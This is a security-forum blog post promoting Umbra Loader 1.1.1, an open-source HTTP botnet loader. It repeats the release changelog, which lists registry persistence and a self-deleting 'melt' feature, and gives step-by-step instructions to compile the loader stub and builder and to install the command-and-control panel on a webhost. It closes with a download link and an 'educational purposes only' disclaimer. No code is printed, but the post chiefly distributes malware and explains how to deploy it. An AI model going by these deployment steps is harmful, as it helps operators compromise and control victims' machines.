
A look into HTTP botnets – Umbra Loader

Umbra Loader is a popular open source HTTP botnet project, and version 1.1.1 was recently released by the developer, Slayer616.

Slayer616 publishes programs he has coded on his blog, including his Schwarze Sonne RAT (available on code.google.com) and Umbra Loader. Umbra Loader is popular because it is open source, has no dependencies (it is coded in Delphi) and is somewhat stable.

Umbra Loader based botnets have been found in the wild; here is one that has been exposed.

Webroot's analysis of Umbra Loader.

Release Notes:

Changelog:
[Version 1.1.1]
- added Registry-Persistence
- added Melt
- fixed installation process
- tweaked MD5

HowTo build loader:
-Compile /Binary/prjLoader_XE2.dpr with Delphi XE2
-Copy /Binary/prjLoader_XE2.exe to /Builder/stub/stub.exe
-Compile /Builder/prjBuilder.dpr with Delphi XE2
-run prjBuilder.exe

HowTo setup panel:
-create new table in phpMyAdmin
-edit /Panel/Panel/inc/config.php
-upload /Panel/ to your webhost
-use /Panel/Panel/install.php to install database
-delete /Panel/Panel/install.php
-done!

Pictures of the web panel:

builder:

 

 Download

Umbra loader USE: EDUCATIONAL PURPOSES ONLY

About FastFlux

Owner of ZeroSecurity, interested in programming, malware analysis and penetration testing. If you are interested in joining the ZeroSecurity team please use the contact forum located above to contact us.